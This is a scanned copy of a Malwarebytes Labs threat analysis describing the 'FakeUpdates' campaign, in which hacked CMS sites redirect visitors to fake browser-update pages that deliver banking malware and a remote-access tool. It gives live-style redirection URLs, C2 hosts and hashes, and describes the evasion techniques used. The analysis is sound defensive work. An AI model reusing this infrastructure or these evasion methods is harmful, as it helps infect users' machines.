blog.malwarebytes.com Open in urlscan Pro
130.211.198.3  Public Scan

Form analysis
3 forms found in the DOM

<form><span class="fieldset">
    <p><input type="checkbox" value="check" id="chkMain" checked="checked" class="legacy-group-status optanon-status-checkbox"><label for="chkMain">Active</label></p>
  </span></form>

GET

<form id="search-form" onsubmit="submitSearchrightrail(event)" method="get">
  <div class="searchbar-wrap-rightrail">
    <label for="cta-labs-rightrail-search-submit-en" aria-label="cta-labs-rightrail-search-submit-en" aria-labelledby="cta-labs-rightrail-search-submit-en">
      <input type="text" id="st-search-input-rightrail" class="st-search-input-rightrail" placeholder="Search Labs">
    </label>
    <button type="submit" id="cta-labs-rightrail-search-submit-en" aria-label="Submit your search query"><span class=""><img src="https://blog.malwarebytes.com/wp-content/themes/mb-labs-theme/images/search.svg" alt="Magnifying glass"></span>
    </button>
  </div>
</form>

//www.malwarebytes.com/newsletter/

<form class="newsletter-form form-inline" action="//www.malwarebytes.com/newsletter/" _lpchecked="1">
  <div class="email-input">
    <label for="cta-footer-newsletter-input-email-en" aria-label="cta-footer-newsletter-input-email-en" aria-labelledby="cta-footer-newsletter-input-email-en">
      <input type="text" class="email-input-field" id="cta-footer-newsletter-input-email-en" name="email" placeholder="Email address">
    </label>
    <input name="source" type="hidden" value="">
    <input type="submit" class="submit-bttn" id="cta-footer-newsletter-subscribe-email-en" value="">
  </div>
</form>

Text Content

Who doesn't like cookies?

We use cookies to help us enhance your online experience. If that sounds good,
click “Accept All Cookies” or review our Privacy and Cookie Policy.


Close
Accept All Cookies


 * Your Privacy

 * Strictly Necessary Cookies

 * Performance Cookies

 * Functional Cookies

 * Targeting Cookies

 * More Information

Privacy Preference Center

Active

Always Active



Save Settings

Allow All

The official Malwarebytes logo The official Malwarebytes logo in a blue font B

We research. You level up.

       
Personal
Personal
 * Security & Antivirus
 * Malwarebytes for Windows
 * Malwarebytes for Mac
 * Malwarebytes for Chromebook
 * Malwarebytes Browser Guard
 * Overview

 * Security & Antivirus for Mobile
 * Malwarebytes for Android
 * Malwarebytes for iOS
 * Online Privacy
 * Malwarebytes Privacy VPN

 * Get Started
 * Explore all Personal Products
 * Explore Pricing

 * FREE TRIAL OF MALWAREBYTES PREMIUM
   
   Protect your devices, your data, and your privacy—at home or on the go.
   
   Get free trial

Business
Business
   Solutions
 * BY COMPANY SIZE
 * Small Business
    1-99 Employees 
 * Mid-size Businesses
    100-999 Employees
 * Large Enterprise
    1000+ Empoyees
 * BY INDUSTRY
 * Education
 * Finance
 * Healthcare

   Products
 * CLOUD-BASED SECURITY MANAGEMENT AND SERVICES
 * Endpoint Protection
 * Endpoint Protection for Servers
 * Endpoint Detection & Response
 * Endpoint Detection & Response for Servers
 * Incident Response
 * Malware Removal Service 
 * Nebula Platform Architecture
 * CLOUD-BASED SECURITY MODULES
 * Vulnerability & Patch Management 
 * Remediation for CrowdStrike®
 * NEXT-GEN ANTIVIRUS FOR SMALL BUSINESS
 * For Teams

 * Get Started
 *  * Find the right solution for your business
    * See business pricing
   
   --------------------------------------------------------------------------------
   
    * Don't know where to start?
    * Help me choose a product
   
   --------------------------------------------------------------------------------
   
    * See what Malwarebytes can do for you
    * Get a free trial
   
   --------------------------------------------------------------------------------
   
    * Our team is ready to help. Call us now
    * +1-800-520-2796

Pricing
Partners
Partners
 * Explore Partnerships

 * Partner Solutions
 * Resellers
 * Managed Service Providers
 * Computer Repair
 * Technology Partners

 * Partner Success Story
 * Marek Drummond
   Managing Director at Optimus Systems
   
   "Thanks to the Malwarebytes MSP program, we have this high-quality product in
   our stack. It’s a great addition, and I have confidence that customers’
   systems are protected."

 * See full story

Resources
Resources
 * Learn About Cybersecurity
 * Antivirus
 * Malware
 * Ransomware
 * See all
 * Malwarebytes Labs
 * Explore

 * Business Resources
 * Reviews
 * Analyst Reports
 * Case Studies
 * See all
 * Press & News
 * Learn more

 * Events
 * 
   
   
   
   Featured Event: RSA 2021

 * See Event

Support
Support
 * Technical Support
 * Support
 * Premium Services
 * Forums
 * Vulnerability Disclosure

 * Training for Personal Products
 * Training for Business Products

 * Featured Content
 * 
   
   
   
   Activate Malwarebytes Privacy on Windows device.

 * See Content

FREE DOWNLOAD
CONTACT US
COMPANY
Company
 * About Malwarebytes
 * Careers
 * News & Press

SIGN IN
Sign In
 * My Account
 * Cloud Console
 * Partner Portal

SUBSCRIBE


Level Up to Cloud-Based Business Protection. Save 25% Today >

Social engineering | Threat analysis


‘FAKEUPDATES’ CAMPAIGN LEVERAGES MULTIPLE WEBSITE PLATFORMS

Posted: April 10, 2018 by Jérôme Segura
Last updated: November 15, 2018

Browser update? Do not trust, and do verify before downloading potential
malware.

A malware campaign which seems to have started at least since December 2017 has
been gaining steam by enrolling a growing number of legitimate but compromised
websites. Its modus operandi relies on social engineering users with fake but
convincing update notifications.

Similar techniques were used by a group leveraging malvertising on high traffic
websites such as Yahoo to distribute ad fraud malware. The patterns are also
somewhat reminiscent of EITest’s HoeflerText campaign where hacked websites are
scrambled and offer a font for download. More recently, there has been a
campaign affecting Magento websites that also pushes fake updates (for the Flash
Player) which delivers the AZORult stealer by abusing GitHub for hosting.

Today, we are looking at what we call the ‘FakeUpdates campaign’ and describing
its intricate filtering and evasion techniques. One of the earliest examples we
could find was reported by BroadAnalysis on December 20, 2017. The update file
is not an executable but rather a script which is downloaded from DropBox, a
legitimate file hosting service, as can be seen in the animation below.



Figure 1: A typical redirection to the ‘FakeUpdates’ scheme from a hacked site

This campaign affects multiple Content Management Systems (CMS) in somewhat
similar ways. Several of the websites we checked were outdated and therefore
vulnerable to malicious code injection. It is possible that attackers used the
same techniques to build their inventory of compromised sites but we do not have
enough information to confirm this theory.


WORDPRESS AND JOOMLA

Both WordPress and Joomla sites that were hacked bear the same kind of injection
within their CMS’ JavaScript files.



Figure 2: A Compromised WordPress site pushing a fake Google Chrome update



Figure 3: A Compromised Joomla site pushing a fake Mozilla Firefox update

Some commonly injected files include the jquery.js and caption.js libraries
where code is typically appended and can be spotted by doing a comparison with a
clean copy of the same file.



Figure 4: Diffing a clean and suspicious copy of the same library

The additional blurb of code is responsible for the next chain of events that
loads the fraudulent layer onto the website you are visiting. The image below
shows a beautified version of the code injected in the CMS platforms, whose goal
is to call the redirection URL:



Figure 5: Injected code responsible for the redirection

We wrote a simple crawler to browse a list of sites and then parsed the results.
We were able to identify several hundred compromised WordPress and Joomla
websites even after a small iteration through the list. Although we don’t have
an exact number of sites that are affected, we surmise that it is in the
thousands.



Figure 6: A partial list of compromised sites


SQUARESPACE

Squarespace is another popular Content Management System that is also affected
by the same campaign. This was pointed out by @Ring0x0 and we found a forum post
dated February 28, where a Squarespace user is asking for help, saying “it
basically redirected me to a full page “your version of chrome needs updating“”.



Figure 7: A Squarespace user reporting that their sites was tampered with

So I login to the admin panel and in the GIT HISTORY it shows that one of my
users which has never even logged in before, has sent an upload: site-bundle.js
last week, along with some other big list of files {sic}.

We dug deeper into these compromises and identified a slightly different
redirection mechanism than the one used on WordPress or Joomla sites. With
Squarespace, a blurb of JavaScript is injected directly into the site’s homepage
instead.



Figure 8: Traffic showing a malicious redirection taking place on a Squarespace
site

It pulls a source file from query[.]network that in turn retrieves bundle.js
from boobahbaby[.]com:



Figure 9: The injected code present in hacked Squarespace sites 

bundle.js contains the same script we described earlier that is used to call the
redirection URL:



Figure 10: The same redirection code used in WP and Joomla infections is used
here

According to this PublicWWW query, a little over 900 SquareSpace sites have been
injected with this malicious redirection code.



Figure 11: Identifying other hacked Squarespace sites using a string pattern


REDIRECTION URL AND FILTERING

All CMSes trigger redirection URIs with similar patterns that eventually load
the fraudulent update theme. Based on our tests, the URIs have identifiers that
apply to a particular CMS; for example cid=221 is associated with WordPress
sites, while cid=208 with Joomla.

WordPress 
track.positiverefreshment[.]org/s_code.js?cid=221&v=8fdbe4223f0230a93678
track.positiverefreshment.org/s_code.js?cid=225&v=0bbea7365fbb07c7acb3 
track.amishbrand[.]com/s_code.js?cid=205&v=c40bfeff70a8e1abc00f 
track.amishbrand.com/s_code.js?cid=228&v=e8bfa92965d1d880bac2 
track.amishbrand[.]com/s_code.js?cid=234&v=59f4ba6c3cd7f37abedc 
track.amishbrand[.]com/s_code.js?cid=237&v=7e3403034b8bf0ac23c6 

Joomla 
connect.clevelandskin[.]com/s_code.js?cid=208&v=e1acdea1ea51b0035267 
track.positiverefreshment[.]org/s_code.js?cid=220&v=24eca7c911f5e102e2ba 
track.amishbrand[.]com/s_code.js?cid=226&v=4d25aa10a99a45509fa2 

SquareSpace 
track.amishbrand[.]com/s_code.js?cid=232&v=47acc84c33bf85c5496d 

Open Journal Systems 
track.positiverefreshment[.]org/s_code.js?cid=223&v=7124cc38a60ff6cb920d 

Unknown CMS 
track.positiverefreshment[.]org/s_code.js?cid=211&v=7c6b1d9ec5023db2b7d9 
track.positiverefreshment[.]org/s_code.js?cid=227&v=a414ad4ad38395fc3c3b

There are other interesting artifacts on this infrastructure, such as an ad
rotator:

track.positiverefreshment.net:81/adrotator/banner.js?cid=100

But if we focus on the redirection code itself, we notice that potential victims
are fingerprinted and the ultimate redirection to the FakeUpdates template is
conditional, in particular with only one hit per single IP address. The last
JavaScript is responsible for creating the iframe URL to that next sequence.



Figure 12: Fingerprinting, cookie verification and iframe redirection are
performed here


FAKEUPDATES THEME

There are templates for the Chrome, Firefox and Internet Explorer browsers, the
latter getting a bogus Flash Player update instead.

 

 

 



Figure 13: Attackers are targeting browsers with professional looking templates

The decoy pages are hosted on compromised hosts via sub-domains using URIs with
very short life spans. Some of those domains have a live (and legitimate
website) whereas others are simply parked:

Legitimate (shadowed) domain:

https://pask.spgolfshoes[.]com/95b40f61578eed04ff464c5055990abbupdate{trimmed}



Figure 14: This property’s credentials have most likely been stolen and used to
register a malicious subdomain

Parked domain:

http://zlsk.redneckonize[.]com/wordpress/article.php?f=445327&g={trimmed}



Figure 15: Parked domains can hide ulterior motives


FINAL INFECTION CHAIN AND PAYLOADS

The infection starts with the fake update disguised as a JavaScript file
retrieved from the Dropbox file hosting service. The link to Dropbox, which
is updated at regular intervals, is obfuscated inside of the the first web
session belonging to the fake theme.


Figure 16: the fileURL variable contains the Dropbox URL

This JavaScript is heavily obfuscated to make static analysis very difficult and
also to hide some crucial fingerprinting that is designed to evade virtual
machines and sandboxes.



Figure 17: The malicious JavaScript downloaded from DropBox

According to this very good and detailed analysis of the JS file, this is
because step2 of the victim’s profiling uses WScript.Network and WMI to collect
system information (BIOS, manufacturer, architecture, MAC address, processes,
etc) and eventually makes the decision to continue with the payload or end the
script without delivering it.

A failed infection will only contain 2 callbacks to the C2 server:



Figure 18: A host that is not a genuine machine was detected and infection
aborted

While a successful infection will contain 3 callbacks to the C2 server
(including the payload):



Figure 19: When all checks pass, the user is served the payload

The encoded payload stream is decoded by wscript.exe and a malicious binary
(Chrome_71.1.43.exe in this case), dropped in the %temp% folder. That file was
digitally signed and also employed various evasion techniques (such as an
immediate reboot) to defeat sandboxes.



Figure 20: A digitally signed file is no guarantee for safety

Upon examination, we determined that this is the Chtonic banking malware, a
variant of ZeusVM. Once the system has restarted, Chtonic retrieves a hefty
configuration file from 94.100.18[.]6/3.bin.

In a second replay attempt, we got the NetSupport Remote Access Tool, a
commercial RAT instead. Its installation and configuration were already well
covered in this blog. Once again, we noticed the heavy use of obfuscation
throughout the delivery of this program that can be used for malicious purposes
(file transfer, remote Desktop, etc.).



Figure 21: Traffic from the RAT infection, showing its backend server


CONCLUSION

This campaign relies on a delivery mechanism that leverages social engineering
and abuses a legitimate file hosting service. The ‘bait’ file consists of a
script rather than a malicious executable, giving the attackers the flexibility
to develop interesting obfuscation and fingerprinting techniques.

Compromised websites were abused to not only redirect users but also to host the
fake updates scheme, making their owners unwitting participants in a malware
campaign. This is why it is so important to keep Content Management Systems up
to date, as well as use good security hygiene when it comes to authentication.

Malwarebytes blocks the domains and servers used in this attack, as well as the
final payload.


INDICATORS OF COMPROMISE

Redirection infrastructure:

23.152.0[.]118
84.200.84[.]236
185.243.112[.]38
185.77.129.11
eventsbysteph[.]com
query[.]network
connect.clevelandskin[.]net
connect.clevelandskin[.]org
track.amishbrand[.]com
track.positiverefreshment[.]org
link.easycounter210[.]com
click.clickanalytics208[.]com


C2

my.gobiox[.]com
login3.kimbrelelectric[.]com (thanks @nao_sec)

Dropped binaries:

Chtonic

6f3b0068793b277f1d948e11fe1a1d1c1aa78600712ec91cd0c0e83ed2f4cf1f
94.100.18[.]6/3.bin

NetSupport RAT

4d24b359176389301c14a92607b5c26b8490c41e7e3a2abbc87510d1376f4a87


RELATED

New social engineering toolkit draws inspiration from previous web
campaignsSeptember 3, 2019In "Social engineering"

Malsmoke operators abandon exploit kits in favor of social engineering
schemeNovember 16, 2020In "Exploits"

Domen toolkit gets back to work with new malvertising campaignFebruary 28,
2020In "Threat analysis"

SHARE THIS ARTICLE

--------------------------------------------------------------------------------

COMMENTS


0 COMMENTS

--------------------------------------------------------------------------------


LEAVE A REPLY CANCEL REPLY

You must be logged in to post a comment. Click here to login or connect a social
media account to leave a comment.

--------------------------------------------------------------------------------

RELATED ARTICLES

Exploits and vulnerabilities


GOOGLE LAUNCHES CHROME 99, FIXES 28 VULNERABILITIES

March 2, 2022 - Google has launched major version 99 of the Chrome browser. This
update includes a patch for 28 vulnerabilities.

CONTINUE READINGNo Comments

A week in security


A WEEK IN SECURITY (FEBRUARY 14 – FEBRUARY 20)

February 21, 2022 - The most important and interesting security stories from the
last seven days.

CONTINUE READINGNo Comments

101


FIREFOX AND CHROME REACHING MAJOR VERSIONS 100 MAY BREAK SOME WEBSITES

February 17, 2022 - With some of the most popular browsers reaching major
versions 100, what problems can we expect because of the 3 digit version
numbers?

CONTINUE READINGNo Comments

Exploits and vulnerabilities


UPDATE NOW! CHROME PATCHES ACTIVELY EXPLOITED ZERO-DAY VULNERABILITY

February 15, 2022 - Google has patched 11 bugs in Chrome, one of which was being
actively exploited.

CONTINUE READINGNo Comments

A week in security


A WEEK IN SECURITY (JANUARY 17 – 23)

January 25, 2022 - The most important and interesting security stories from the
last seven days.

CONTINUE READINGNo Comments

--------------------------------------------------------------------------------

ABOUT THE AUTHOR

Jérôme Segura
Director of Threat Intelligence

A special interest for web threats.


Contributors


Threat Center


Podcast


Glossary


Scams


Write for Labs

CYBERSECURITY INFO YOU CAN'T DO WITHOUT

Want to stay informed on the latest news in cybersecurity? Sign up for our
newsletter and learn how to protect your computer from threats.



Imagine a world without malware. We do.

FOR PERSONAL

FOR BUSINESS

COMPANY

ABOUT US

CAREERS

NEWS AND PRESS

MY ACCOUNT

SIGN IN

CONTACT US

GET SUPPORT

CONTACT SALES

3979 Freedom Circle, 12th Floor
Santa Clara, CA 95054
One Albert Quay, 2nd Floor
Cork T12 X8N6
Ireland

   English
Legal
Privacy
Accessibility
Terms of Service


© 2022 All Rights Reserved

Select your language

 * English
 * Deutsch
 * Español
 * Français
 * Italiano
 * Português (Portugal)
 * Português (Brasil)
 * Nederlands
 * Polski
 * Pусский
 * 日本語
 * Svenska

Cybersecurity basics

Your intro to everything relating to cyberthreats, and how to stop them.



 

Loading Comments...

 


You must be logged in to post a comment.